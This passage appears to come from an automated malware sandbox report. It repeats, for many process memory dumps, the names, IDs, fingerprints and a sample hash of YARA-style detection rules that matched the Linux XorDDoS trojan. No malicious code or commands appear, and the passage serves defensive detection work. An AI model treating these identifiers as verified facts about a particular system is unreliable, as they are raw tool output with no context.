        Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
